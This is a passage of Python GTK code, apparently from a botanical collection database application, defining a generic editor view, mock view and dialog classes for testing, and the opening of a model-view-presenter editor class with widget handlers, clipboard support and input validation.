or\n          MESSAGE_BOX_YESNO\n        \"\"\"\n        return utils.add_message_box(self.widgets.message_box_parent,\n                                     message_box_type)\n\n    def connect_signals(self, target):\n        'connect all signals declared in the glade file'\n        if not hasattr(self, 'signals'):\n            from lxml import etree\n            doc = etree.parse(self.filename)\n            self.signals = doc.xpath('//signal')\n        for s in self.signals:\n            try:\n                handler = getattr(target, s.get('handler'))\n            except AttributeError as text:\n                logger.debug(\"AttributeError: %s\" % text)\n                continue\n            signaller = getattr(self.widgets, s.getparent().get('id'))
\n            handler_id = signaller.connect(s.get('name'), handler)\n            self.__attached_signals.append((signaller, handler_id))\n\n    def set_accept_buttons_sensitive(self, sensitive):\n        '''set the sensitivity of all the accept/ok buttons\n\n        '''\n        for wname in self.accept_buttons:\n            getattr(self.widgets, wname).set_sensitive(sensitive)\n\n    def connect(self, obj, signal, callback, *args):\n        \"\"\"\n        Attach a signal handler for signal on obj. For more\n        information see :meth:`GObject.connect_after`\n\n        :param obj: An instance of a subclass of gobject that will\n          receive the signal\n\n        :param signal: the name of the signal the object will receive\n\n        :param callback: the function or method to call when the object\n          receives the signal\n\n        :param args: extra args to pass to the callback\n        \"\"\"\n        if isinstance(obj, str):\n            obj = self.widgets[obj]\n        sid = obj.connect(signal, callback, *args)\n        self.__attached_signals.append((obj, sid))\n        return sid\n\n    def connect_after(self, obj, signal, callback, *args):  # data=None):\n        \"\"\"\n        Attach a signal handler for signal on obj. For more\n        information see :meth:`GObject.connect_after`\n\n        :param obj: An instance of a subclass of gobject that will\n          receive the signal\n\n        :param signal: the name of the signal the object will receive\n\n        :param callback: the function or method to call when the object\n          receives the signal\n\n        :param args: extra args to pass to the callback\n        \"\"\"\n        if isinstance(obj, str):\n            obj = self.widgets[obj]\n        sid = obj.connect_after(signal, callback, *args)\n        # if data:\n        #     sid = obj.connect_after(signal, callback, data)\n        # else:\n        #     sid = obj.connect_after(signal, callback)\n        self.__attached_signals.append((obj, sid))\n        return sid\n\n    def disconnect_all(self):\n        \"\"\"\n        Disconnects all the signal handlers attached with\n        :meth:`GenericEditorView.connect` or\n        :meth:`GenericEditorView.connect_after`\n        \"\"\"\n        logger.debug('GenericEditorView:disconnect_all')\n        for obj, sid in self.__attached_signals:\n            obj.disconnect(sid)\n        del self.__attached_signals[:]\n\n    def disconnect_widget_signals(self, widget):\n        \"\"\"disconnect all signals attached to widget\"\"\"\n\n        removed = []\n        for obj, sid in self.__attached_signals:\n            if obj == widget:\n                widget.disconnect(sid)\n                removed.append((obj, sid))\n\n        for item in removed:\n            self.__attached_signals.remove(item)\n\n    def get_window(self):\n        \"\"\"\n        Return the top level window for view\n        \"\"\"\n        if self.root_widget_name is not None:\n            return getattr(self.widgets, self.root_widget_name)\n        else:\n            raise NotImplementedError\n\n    def __get_widget(self, widget):\n        p = widget\n        if isinstance(widget, Gtk.Widget):\n            return widget\n        elif isinstance(widget, tuple):\n            if len(widget) == 1:\n                return self.__get_widget(widget[0])\n            parent, widget = widget[:-1], widget[-1]\n            parent = self.__get_widget(parent)\n            for c in parent.get_children():\n                if Gtk.Buildable.get_name(c) == widget:\n                    return c\n        else:\n            return self.widgets[widget]\n        logger.warning('cannot resolve widget reference %s' % str(p))\n        return None\n\n    def widget_append_page(self, widget, page, label):\n        widget = self.__get_widget(widget)\n        widget.append_page(page, label)\n\n    def widget_add(self, widget, child):\n        widget = self.__get_widget(widget)\n        widget.add(child)\n\n    def widget_get_model(self, widget):\n        widget = self.__get_widget(widget)\n        return widget.get_model()\n\n    def widget_grab_focus(self, widget):\n        widget = self.__get_widget(widget)\n        return widget.grab_focus()\n\n    def widget_get_active(self, widget):
\n        widget = self.__get_widget(widget)\n        return widget.get_active()\n\n    def widget_set_active(self, widget, active=True):\n        widget = self.__get_widget(widget)\n        return widget.set_active(active)\n\n    def widget_set_attributes(self, widget, attribs):\n        widget = self.__get_widget(widget)\n        return widget.set_attributes(attribs)\n\n    def widget_set_inconsistent(self, widget, value):\n        widget = self.__get_widget(widget)\n        widget.set_inconsistent(value)\n\n    def combobox_init(self, widget, values=None, cell_data_func=None):\n        combo = self.__get_widget(widget)\n        model = Gtk.ListStore(str)\n        combo.clear()\n        combo.set_model(model)\n        renderer = Gtk.CellRendererText()\n        combo.pack_start(renderer, True)\n        combo.add_attribute(renderer, 'text', 0)\n        self.combobox_setup(combo, values, cell_data_func)\n\n    def combobox_setup(self, combo, values, cell_data_func):\n        if values is None:\n            return\n        return utils.setup_text_combobox(combo, values, cell_data_func)\n\n    def combobox_remove(self, widget, item):\n        widget = self.__get_widget(widget)\n        if isinstance(item, str):\n            # remove matching\n            model = widget.get_model()\n            for i, row in enumerate(model):\n                if item == row[0]:\n                    widget.remove_text(i)\n                    break\n            else:\n                logger.warning(\"combobox_remove - not found >%s<\" % item)\n        elif isinstance(item, int):\n            # remove at position\n            widget.remove_text(item)\n        else:\n            logger.warning('invoked combobox_remove with item=(%s)%s' %\n                           (type(item), item))\n\n    def combobox_append_text(self, widget, value):\n        widget = self.__get_widget(widget)\n        widget.append_text(value)\n\n    def combobox_prepend_text(self, widget, value):\n        widget = self.__get_widget(widget)\n        widget.prepend_text(value)\n\n    def combobox_get_active_text(self, widget):\n        widget = self.__get_widget(widget)\n        return widget.get_active_text()\n\n    def combobox_get_active(self, widget):\n        widget = self.__get_widget(widget)\n        return widget.get_active()\n\n    def combobox_set_active(self, widget, index):\n        widget = self.__get_widget(widget)\n        widget.set_active(index)\n\n    def combobox_get_model(self, widget):\n        'get the list of values in the combo'\n        widget = self.__get_widget(widget)\n        return widget.get_model()\n\n    def widget_emit(self, widget, value):\n        widget = self.__get_widget(widget)\n        widget.emit(value)\n\n    def widget_set_expanded(self, widget, value):\n        widget = self.__get_widget(widget)\n        widget.set_expanded(value)\n\n    def widget_set_sensitive(self, widget, value=True):\n        widget = self.__get_widget(widget)\n        widget.set_sensitive(value and True or False)\n\n    def widget_set_visible(self, widget, visible=True):\n        widget = self.__get_widget(widget)\n        widget.set_visible(visible)\n\n    def widget_get_visible(self, widget):\n        widget = self.__get_widget(widget)\n        return widget.get_visible()\n\n    def widget_set_text(self, widget, text):\n        widget = self.__get_widget(widget)\n        widget.set_text(text)\n\n    def widget_get_text(self, widget):\n        widget = self.__get_widget(widget)\n        return widget.get_text()\n\n    def widget_get_value(self, widget, index=0):\n        widget = self.__get_widget(widget)\n        return utils.get_widget_value(widget, index)\n\n    def widget_set_value(self, widget, value, markup=False, default=None,\n                         index=0):\n        '''\n        :param widget: a widget or name of a widget in self.widgets\n        :param value: the value to put in the widget\n        :param markup: whether the data in value uses pango markup\n        :param default: the default value to put in the widget if value is None\n        :param index: the row index to use for those widgets who use a model\n\n        This method calls bauble.utils.set_widget_value()\n        
'''\n if isinstance(widget, Gtk.Widget):\n utils.set_widget_value(widget, value, markup, default, index)\n else:\n utils.set_widget_value(self.widgets[widget], value, markup,\n default, index)\n\n def on_dialog_response(self, dialog, response, *args):\n '''\n Called if self.get_window() is a Gtk.Dialog and it receives\n the response signal.\n '''\n logger.debug('on_dialog_response')\n dialog.hide()\n self.response = response\n return response\n\n def on_dialog_close(self, dialog, event=None):\n \"\"\"\n Called if self.get_window() is a Gtk.Dialog and it receives\n the close signal.\n \"\"\"\n logger.debug('on_dialog_close')\n dialog.hide()\n return False\n\n def on_window_delete(self, window, event=None):\n \"\"\"\n Called when the window return by get_window() receives the\n delete event.\n \"\"\"\n logger.debug('on_window_delete')\n window.hide()\n return False\n\n def attach_completion(self, entry,\n cell_data_func=default_completion_cell_data_func,\n match_func=default_completion_match_func,\n minimum_key_length=2,\n text_column=-1):\n \"\"\"\n Attach an entry completion to a Gtk.Entry. The defaults\n values for this attach_completion assumes the completion popup\n only shows text and that the text is in the first column of\n the model.\n\n Return the completion attached to the entry.\n\n NOTE: If you are selecting completions from strings in your model\n you must set the text_column parameter to the column in the\n model that holds the strings or else when you select the string\n from the completions it won't get set properly in the entry\n even though you call entry.set_text().\n\n :param entry: the name of the entry to attach the completion\n\n :param cell_data_func: the function to use to display the rows in\n the completion popup\n\n :param match_func: a function that returns True/False if the\n value from the model should be shown in the completions\n\n :param minimum_key_length: default=2\n\n :param text_column: the value of the text-column property on the entry,\n default is -1\n \"\"\"\n\n # TODO: we should add a default ctrl-space to show the list of\n # completions regardless of the length of the string\n completion = Gtk.EntryCompletion()\n cell = Gtk.CellRendererText() # set up the completion renderer\n completion.pack_start(cell, True)\n completion.set_cell_data_func(cell, cell_data_func)\n completion.set_match_func(match_func)\n completion.set_property('text-column', text_column)\n completion.set_minimum_key_length(minimum_key_length)\n completion.set_popup_completion(True)\n completion.props.popup_set_width = False\n if isinstance(entry, str):\n self.widgets[entry].set_completion(completion)\n else:\n entry.set_completion(completion)\n\n # allow later access to the match func just in case\n completion._match_func = match_func\n\n return completion\n\n # TODO: add a default value to set in the combo\n def init_translatable_combo(self, combo, translations, default=None,\n cmp=None):\n \"\"\"\n Initialize a Gtk.ComboBox with translations values where\n model[row][0] is the value that will be stored in the database\n and model[row][1] is the value that will be visible in the\n Gtk.ComboBox.\n\n A Gtk.ComboBox initialized with this method should work with\n self.assign_simple_handler()\n\n :param combo:\n :param translations: a list of pairs, or a dictionary,\n of values->translation.\n \"\"\"\n if isinstance(combo, str):\n combo = self.widgets[combo]\n combo.clear()\n # using 'object' avoids SA unicode warning\n model = Gtk.ListStore(object, str)\n if 
isinstance(translations, dict):\n            translations = sorted(translations.items(),\n                                  key=lambda x: (x[1] is not None, x[1]))\n        if cmp is not None:\n            translations = sorted(translations,\n                                  key=lambda a: (a[0] is not None, a[0]))\n        for key, value in translations:\n            model.append([key, value])\n        combo.set_model(model)\n        cell = Gtk.CellRendererText()\n        combo.pack_start(cell, True)\n        combo.add_attribute(cell, 'text', 1)\n\n    def save_state(self):\n        '''\n        Save the state of the view by setting a value in the preferences\n        that will be restored in restore_state\n        e.g. prefs[pref_string] = pref_value\n        '''\n        pass\n\n    def restore_state(self):\n        '''\n        Restore the state of the view, this is usually done by getting a value\n        from the preferences and setting the equivalent in the interface\n        '''\n        pass\n\n    def start(self):\n        ## while being run, the view will invoke callbacks in the presenter\n        ## which, in turn, will alter the attributes in the model.\n        return self.get_window().run()\n\n    def cleanup(self):\n        \"\"\"\n        Should be called after self.start() returns.\n\n        By default all it does is call self.disconnect_all()\n        \"\"\"\n        self.disconnect_all()\n\n    def mark_problem(self, widget):\n        pass\n\n\nclass MockDialog:\n    def __init__(self):\n        self.hidden = False\n        self.content_area = Gtk.VBox()\n\n    def hide(self):\n        self.hidden = True\n\n    def run(self):\n        pass\n\n    def show(self):\n        pass\n\n    def add_accel_group(self, group):\n        pass\n\n    def get_content_area(self):\n        return self.content_area\n\n\nclass MockView:\n    '''mocking the view, but so generic that we share it among clients\n    '''\n    def __init__(self, **kwargs):\n        self.widgets = type('MockWidgets', (object, ), {})()\n        self.models = {}  # dictionary of list of tuples\n        self.invoked = []\n        self.invoked_detailed = []\n        self.visible = {}\n        self.sensitive = {}\n        self.expanded = {}\n        self.values = {}\n        self.index = {}\n        self.selection = []\n        self.reply_entry_dialog = []\n        self.reply_yes_no_dialog = []\n        self.reply_file_chooser_dialog = []\n        self.__window = MockDialog()\n        for name, value in list(kwargs.items()):\n            setattr(self, name, value)\n        self.boxes = set()\n\n    def init_translatable_combo(self, *args):\n        self.invoked.append('init_translatable_combo')\n        self.invoked_detailed.append((self.invoked[-1], args))\n        pass\n\n    def get_selection(self):\n        'fakes main UI search result - selection'\n        return self.selection\n\n    def image_set_from_file(self, *args):\n        self.invoked.append('image_set_from_file')\n        self.invoked_detailed.append((self.invoked[-1], args))\n        pass\n\n    def run_file_chooser_dialog(\n            self, text, parent, action, buttons, last_folder, target):\n        args = [text, parent, action, buttons, last_folder, target]\n        self.invoked.append('run_file_chooser_dialog')\n        self.invoked_detailed.append((self.invoked[-1], args))\n        try:\n            reply = self.reply_file_chooser_dialog.pop()\n        except:\n            reply = ''\n        self.widget_set_value(target, reply)\n\n    def run_entry_dialog(self, *args, **kwargs):\n        self.invoked.append('run_entry_dialog')\n        self.invoked_detailed.append((self.invoked[-1], args))\n        try:\n            return self.reply_entry_dialog.pop()\n        except:\n            return ''\n\n    def run_message_dialog(self, msg, type=Gtk.MessageType.INFO,\n                           buttons=Gtk.ButtonsType.OK, parent=None):\n        self.invoked.append('run_message_dialog')\n        args = [msg, type, buttons, parent]\n        self.invoked_detailed.append((self.invoked[-1], args))\n\n    def run_yes_no_dialog(self, msg, parent=None, yes_delay=-1):\n        self.invoked.append('run_yes_no_dialog')\n        args = [msg, parent, yes_delay]\n        
self.invoked_detailed.append((self.invoked[-1], args))\n try:\n return self.reply_yes_no_dialog.pop()\n except:\n return True\n\n def set_title(self, *args):\n self.invoked.append('set_title')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def set_icon(self, *args):\n self.invoked.append('set_icon')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def combobox_init(self, name, values=None, *args):\n self.invoked.append('combobox_init')\n self.invoked_detailed.append((self.invoked[-1], [name, values, args]))\n self.models[name] = []\n for i in values or []:\n self.models[name].append((i, ))\n\n def connect_signals(self, *args):\n self.invoked.append('connect_signals')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def set_label(self, *args):\n self.invoked.append('set_label')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def connect_after(self, *args):\n self.invoked.append('connect_after')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def widget_get_value(self, widget, *args):\n self.invoked.append('widget_get_value')\n self.invoked_detailed.append((self.invoked[-1], [widget, args]))\n return self.values.get(widget)\n\n def widget_set_value(self, widget, value, *args):\n self.invoked.append('widget_set_value')\n self.invoked_detailed.append((self.invoked[-1], [widget, value, args]))\n self.values[widget] = value\n if widget in self.models:\n if (value, ) in self.models[widget]:\n self.index[widget] = self.models[widget].index((value, ))\n else:\n self.index[widget] = -1\n\n def connect(self, *args):\n self.invoked.append('connect')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def widget_get_visible(self, name):\n self.invoked.append('widget_get_visible')\n self.invoked_detailed.append((self.invoked[-1], [name]))\n return self.visible.get(name)\n\n def widget_set_visible(self, name, value=True):\n self.invoked.append('widget_set_visible')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n self.visible[name] = value\n\n def widget_set_expanded(self, widget, value):\n self.invoked.append('widget_set_expanded')\n self.invoked_detailed.append((self.invoked[-1], [widget, value]))\n self.expanded[widget] = value\n\n def widget_set_sensitive(self, name, value=True):\n self.invoked.append('widget_set_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n self.sensitive[name] = value and True or False\n\n def widget_get_sensitive(self, name):\n self.invoked.append('widget_get_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [name]))\n return self.sensitive[name]\n\n def widget_set_inconsistent(self, *args):\n self.invoked.append('widget_set_inconsistent')\n self.invoked_detailed.append((self.invoked[-1], args))\n pass\n\n def widget_get_text(self, widget, *args):\n self.invoked.append('widget_get_text')\n self.invoked_detailed.append((self.invoked[-1], [widget, args]))\n return self.values[widget]\n\n def widget_set_text(self, *args):\n self.invoked.append('widget_set_text')\n self.invoked_detailed.append((self.invoked[-1], args))\n self.values[args[0]] = args[1]\n\n def widget_grab_focus(self, *args):\n self.invoked.append('widget_grab_focus')\n self.invoked_detailed.append((self.invoked[-1], args))\n\n def widget_set_active(self, *args):\n self.invoked.append('widget_set_active')\n self.invoked_detailed.append((self.invoked[-1], args))\n\n def widget_set_attributes(self, *args):\n 
self.invoked.append('widget_set_attributes')\n self.invoked_detailed.append((self.invoked[-1], args))\n\n def get_window(self):\n self.invoked.append('get_window')\n self.invoked_detailed.append((self.invoked[-1], []))\n return self.__window\n\n widget_get_active = widget_get_value\n\n def combobox_remove(self, name, item):\n self.invoked.append('combobox_remove')\n self.invoked_detailed.append((self.invoked[-1], [name, item]))\n model = self.models.setdefault(name, [])\n if isinstance(item, int):\n del model[item]\n else:\n model.remove((item, ))\n\n def combobox_append_text(self, name, value):\n self.invoked.append('combobox_append_text')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n model = self.models.setdefault(name, [])\n model.append((value, ))\n\n def combobox_prepend_text(self, name, value):\n self.invoked.append('combobox_prepend_text')\n self.invoked_detailed.append((self.invoked[-1], [name, value]))\n model = self.models.setdefault(name, [])\n model.insert(0, (value, ))\n\n def combobox_set_active(self, widget, index):\n self.invoked.append('combobox_set_active')\n self.invoked_detailed.append((self.invoked[-1], [widget, index]))\n self.index[widget] = index\n self.values[widget] = self.models[widget][index][0]\n\n def combobox_get_active_text(self, widget):\n self.invoked.append('combobox_get_active_text')\n self.invoked_detailed.append((self.invoked[-1], [widget, ]))\n return self.values[widget]\n\n def combobox_get_active(self, widget):\n self.invoked.append('combobox_get_active')\n self.invoked_detailed.append((self.invoked[-1], [widget, ]))\n return self.index.setdefault(widget, 0)\n\n def combobox_get_model(self, widget):\n self.invoked.append('combobox_get_model')\n self.invoked_detailed.append((self.invoked[-1], [widget, ]))\n return self.models[widget]\n\n def set_accept_buttons_sensitive(self, sensitive=True):\n self.invoked.append('set_accept_buttons_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [sensitive, ]))\n pass\n\n def mark_problem(self, widget):\n pass\n\n def add_message_box(self, message_box_type=utils.MESSAGE_BOX_INFO):\n self.invoked.append('set_accept_buttons_sensitive')\n self.invoked_detailed.append((self.invoked[-1], [message_box_type, ]))\n return MockDialog()\n\n def add_box(self, box):\n self.invoked.append('add_box')\n self.invoked_detailed.append((self.invoked[-1], [box, ]))\n self.boxes.add(box)\n\n def remove_box(self, box):\n self.invoked.append('remove_box')\n self.invoked_detailed.append((self.invoked[-1], [box, ]))\n if box in self.boxes:\n self.boxes.remove(box)\n\n\nclass DontCommitException(Exception):\n \"\"\"\n This is used for GenericModelViewPresenterEditor.commit_changes() to\n signal that for some reason the editor doesn't want to commit the current\n values and would like to redisplay\n \"\"\"\n pass\n\n\nclass GenericEditorPresenter(object):\n \"\"\"\n The presenter of the Model View Presenter Pattern\n\n :param model: an object instance mapped to an SQLAlchemy table\n :param view: should be an instance of GenericEditorView\n\n The presenter should usually be initialized in the following order:\n 1. initialize the widgets\n 2. refresh the view, put values from the model into the widgets\n 3. 
class GenericEditorPresenter(object):\n    \"\"\"\n    The presenter of the Model View Presenter Pattern\n\n    :param model: an object instance mapped to an SQLAlchemy table\n    :param view: should be an instance of GenericEditorView\n\n    The presenter should usually be initialized in the following order:\n    1. initialize the widgets\n    2. refresh the view, put values from the model into the widgets\n    3. connect the signal handlers\n    \"\"\"\n    problem_color = Gdk.color_parse('#FFDCDF')\n    widget_to_field_map = {}\n    view_accept_buttons = []\n\n    PROBLEM_DUPLICATE = random()\n    PROBLEM_EMPTY = random()\n\n    def __init__(self, model, view, refresh_view=False, session=None,\n                 do_commit=False, committing_results=[Gtk.ResponseType.OK]):\n        self.model = model\n        self.view = view\n        self.problems = set()\n        self._dirty = False\n        self.is_committing_presenter = do_commit\n        self.committing_results = committing_results\n        self.running_threads = []\n        self.owns_session = False\n        self.session = session\n        self.clipboard_presenters = []\n        if not hasattr(self.__class__, 'clipboard'):\n            logger.debug('creating clipboard in presenter class %s' % self.__class__.__name__)\n            self.__class__.clipboard = {}\n\n        if session is None:\n            try:\n                self.session = object_session(model)\n            except Exception as e:\n                logger.debug(\"GenericEditorPresenter::__init__ - %s, %s\" % (type(e), e))\n\n            if self.session is None: # object_session gave None without error\n                if db.Session is not None:\n                    self.session = db.Session()\n                    self.owns_session = True\n                    if isinstance(model, db.Base):\n                        self.model = model = self.session.merge(model)\n                else:\n                    logger.debug('db.Session was None, I cannot get a session.')\n                    self.session = None\n\n        if view:\n            view.accept_buttons = self.view_accept_buttons\n            if model and refresh_view:\n                self.refresh_view()\n            view.connect_signals(self)\n\n    def create_toolbar(self, *args, **kwargs):\n        view, model = self.view, self.model\n        logger.debug('creating toolbar in content_area presenter %s' % self.__class__.__name__)\n        actiongroup = Gtk.ActionGroup('window-clip-actions')\n        accelgroup = Gtk.AccelGroup()\n        fake_toolbar = Gtk.Toolbar()\n        fake_toolbar.set_name('toolbar')\n        view.get_window().add_accel_group(accelgroup)\n        view.get_window().get_content_area().pack_start(fake_toolbar, True, True, 0)\n        for shortcut, cb in (('c', self.on_window_clip_copy),\n                             ('v', self.on_window_clip_paste)):\n            action = Gtk.Action(shortcut, shortcut, 'clip-action', None)\n            actiongroup.add_action_with_accel(action, shortcut)\n            action.connect(\"activate\", cb)\n            action.set_accel_group(accelgroup)\n            action.connect_accelerator()\n            toolitem = action.create_tool_item()\n            fake_toolbar.insert(toolitem, -1)\n        fake_toolbar.set_visible(False)\n        self.clipboard_presenters.append(self)\n\n    def register_clipboard(self):\n        parent = self.parent_ref()\n        parent.clipboard_presenters.append(self)\n\n    def on_window_clip_copy(self, widget, *args, **kwargs):\n        try:\n            notebook = self.view.widgets['notebook']\n            current_page_no = notebook.get_current_page()\n            current_page_widget = notebook.get_nth_page(current_page_no)\n        except Exception:\n            notebook = None\n            current_page_widget = self.view.get_window().get_content_area()\n        for presenter in self.clipboard_presenters:\n            for name in presenter.widget_to_field_map:\n                container = presenter.view.widgets[name]\n                while container.get_parent() != notebook:\n                    if current_page_widget == container:\n                        break\n                    container = container.get_parent()\n                if current_page_widget == container:\n                    value = presenter.view.widget_get_value(name)\n                    logger.debug('writing »%s« in clipboard %s for %s' % (value, presenter.__class__.__name__, name))\n                    presenter.clipboard[name] = value\n\n    def on_window_clip_paste(self, widget, *args, **kwargs):\n        try:\n            notebook = self.view.widgets['notebook']\n            current_page_no = notebook.get_current_page()\n            current_page_widget = notebook.get_nth_page(current_page_no)\n        except Exception:\n            notebook = None\n            current_page_widget = 
self.view.get_window().get_content_area()\n for presenter in self.clipboard_presenters:\n for name in presenter.widget_to_field_map:\n container = presenter.view.widgets[name]\n while container.get_parent() != notebook:\n if current_page_widget == container:\n break\n container = container.get_parent()\n if current_page_widget == container:\n if presenter.view.widget_get_value(name):\n logger.debug('skipping %s in clipboard %s because widget has value' % (name, presenter.__class__.__name__))\n continue\n clipboard_value = presenter.clipboard.get(name)\n if not clipboard_value:\n logger.debug('skipping %s because clipboard %s has no value' % (name, presenter.__class__.__name__))\n continue\n logger.debug('setting »%s« from clipboard %s for %s' % (clipboard_value, presenter.__class__.__name__, name))\n presenter.view.widget_set_value(name, clipboard_value)\n\n def refresh_sensitivity(self):\n logger.debug('you should implement this in your subclass')\n\n def refresh_view(self):\n '''fill the values in the widgets as the field values in the model\n\n for radio button groups, we have several widgets all referring\n to the same model attribute.\n\n '''\n for widget, attr in list(self.widget_to_field_map.items()):\n value = getattr(self.model, attr)\n value = (value is not None) and value or ''\n self.view.widget_set_value(widget, value)\n\n def cancel_threads(self):\n for k in self.running_threads:\n try:\n k.cancel()\n except:\n pass\n for k in self.running_threads:\n k.join()\n self.running_threads = []\n\n def start_thread(self, thread):\n self.running_threads.append(thread)\n thread.start()\n return thread\n\n def idle_start_thread(self, cls, *args, **kwargs):\n def create_and_start(cls, args, kwargs):\n thread = cls(*args, **kwargs)\n self.running_threads.append(thread)\n thread.start()\n GObject.idle_add(create_and_start, cls, args, kwargs)\n\n def commit_changes(self):\n '''\n Commit the changes to self.session()\n '''\n objs = list(self.session)\n try:\n self.session.commit()\n try:\n bauble.gui.get_view().update()\n except Exception as e:\n pass\n except Exception as e:\n self.session.rollback()\n self.session.add_all(objs)\n raise\n finally:\n if self.owns_session:\n self.session.close()\n return True\n\n def __set_model_attr(self, attr, value):\n if getattr(self.model, attr) != value:\n setattr(self.model, attr, value)\n self._dirty = True\n self.view._dirty = True\n self.view.set_accept_buttons_sensitive(not self.has_problems())\n\n def __get_widget_name(self, widget):\n return (isinstance(widget, str)\n and widget\n or Gtk.Buildable.get_name(widget))\n\n widget_get_name = __get_widget_name\n\n def __get_widget_attr(self, widget):\n return self.widget_to_field_map.get(self.__get_widget_name(widget))\n\n def on_textbuffer_changed(self, widget, value=None, attr=None):\n \"\"\"handle 'changed' signal on textbuffer widgets.\n\n this will not work directly. 
check the unanswered question\n http://stackoverflow.com/questions/32106765/\n\n to use it, you need pass the `attr` yourself.\n \"\"\"\n\n if attr is None:\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n if value is None:\n value = widget.props.text\n value = value and utils.utf8(value) or None\n logger.debug(\"on_text_entry_changed(%s, %s) - %s → %s\"\n % (widget, attr, getattr(self.model, attr), value))\n self.__set_model_attr(attr, value)\n\n def on_text_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on generic text entry widgets.\"\n\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n value = self.view.widget_get_value(widget)\n logger.debug(\"on_text_entry_changed(%s, %s) - %s → %s\"\n % (widget, attr, getattr(self.model, attr), value))\n self.__set_model_attr(attr, value)\n return value\n\n def on_numeric_text_entry_changed(self, widget, value=None):\n \"\"\"handle 'changed' signal on numeric text entry widgets.\n\n if the widget is associated to a model attribute, new value is\n type-checked. as long as the user types digits, they are accepted.\n whatever else gets ignored.\n\n \"\"\"\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n value = self.view.widget_get_value(widget)\n if value == '':\n value = 0\n try:\n value = int(value)\n self.__set_model_attr(attr, value)\n except:\n value = getattr(self.model, attr)\n self.view.widget_set_value(widget, value)\n return value\n\n def on_non_empty_text_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on compulsory text entry widgets.\"\n\n value = self.on_text_entry_changed(widget, value)\n if not value:\n self.add_problem(self.PROBLEM_EMPTY, widget)\n else:\n self.remove_problem(self.PROBLEM_EMPTY, widget)\n return value\n\n def on_unique_text_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on text entry widgets with an uniqueness \"\n \"constraint.\"\n\n attr = self.__get_widget_attr(widget)\n if attr is None:\n return\n if value is None:\n value = widget.props.text\n value = value and utils.utf8(value) or None\n if not value:\n self.add_problem(self.PROBLEM_EMPTY, widget)\n else:\n self.remove_problem(self.PROBLEM_EMPTY, widget)\n if getattr(self.model, attr) == value:\n return\n logger.debug(\"on_unique_text_entry_changed(%s, %s) - %s → %s\"\n % (widget, attr, getattr(self.model, attr), value))\n ## check uniqueness\n klass = self.model.__class__\n k_attr = getattr(klass, attr)\n q = self.session.query(klass)\n q = q.filter(k_attr == value)\n omonym = q.first()\n if omonym is not None and omonym is not self.model:\n self.add_problem(self.PROBLEM_DUPLICATE, widget)\n else:\n self.remove_problem(self.PROBLEM_DUPLICATE, widget)\n ## ok\n self.__set_model_attr(attr, value)\n\n def on_datetime_entry_changed(self, widget, value=None):\n \"handle 'changed' signal on datetime entry widgets.\"\n\n attr = self.__get_widget_attr(widget)\n logger.debug(\"on_datetime_entry_changed(%s, %s)\" % (widget, attr))\n if value is None:\n value = widget.props.text\n value = value and utils.utf8(value) or None\n self.__set_model_attr(attr, value)\n\n def on_check_toggled(self, widget, value=None):\n \"handle toggled signal on check buttons\"\n attr = self.__get_widget_attr(widget)\n if value is None:\n value = self.view.widget_get_active(widget)\n self.view.widget_set_inconsistent(widget, False)\n if attr is not None:\n self.__set_model_attr(attr, value)\n else:\n logging.debug(\"presenter %s does not know widget %s\" % (\n 
self.__class__.__name__, self.__get_widget_name(widget)))\n\n on_chkbx_toggled = on_check_toggled\n\n def on_relation_entry_changed(self, widget, value=None):\n attr = self.__get_widget_attr(widget)\n logger.debug(\n 'calling unimplemented on_relation_entry_changed(%s, %s, %s(%s))'\n % (widget, attr, type(value), value))\n\n def on_group_changed(self, widget, *args):\n \"handle group-changed signal on radio-button\"\n if args:\n logger.warning(\"on_group_changed received extra arguments\" +\n str(args))\n attr = self.__get_widget_attr(widget)\n value = self.__get_widget_name(widget)\n self.__set_model_attr(attr, value)\n\n def on_combo_changed(self, widget, value=None, *args):\n \"\"\"handle changed signal on combo box\n\n value is only specified while testing\"\"\"\n attr = self.__get_widget_attr(widget)\n if value is None:\n index = self.view.combobox_get_active(widget)\n widget_model = self.view.combobox_get_model(widget)\n value = widget_model[index][0]\n self.__set_model_attr(attr, value)\n self.refresh_view()\n\n def dirty(self):\n logger.info('calling deprecated \"dirty\". use \"is_dirty\".')\n return self.is_dirty()\n\n # whether the presenter should be commited or not\n def is_dirty(self):\n \"\"\"is the presenter dirty?\n\n the presenter is dirty depending on whether it has changed anything\n that needs to be committed. This doesn't necessarily imply that the\n session is not dirty nor is it required to change back to True if\n the changes are committed.\n \"\"\"\n return self._dirty\n\n def has_problems(self, widget=None):\n \"\"\"\n Return True/False depending on if widget has any problems\n attached to it. if no widget is specified, result is True if\n there is any problem at all.\n \"\"\"\n if widget is None:\n return self.problems and True or False\n for p, w in self.problems:\n if widget == w:\n return True\n return False\n\n def clear_problems(self):\n \"\"\"\n Clear all the problems from all widgets associated with the presenter\n \"\"\"\n tmp = self.problems.copy()\n list(map(lambda p: self.remove_problem(p[0], p[1]), tmp))\n self.problems.clear()\n\n def remove_problem(self, problem_id, widget=None):\n \"\"\"\n Remove problem_id from self.problems and reset the background\n color of the widget(s) in problem_widgets. 
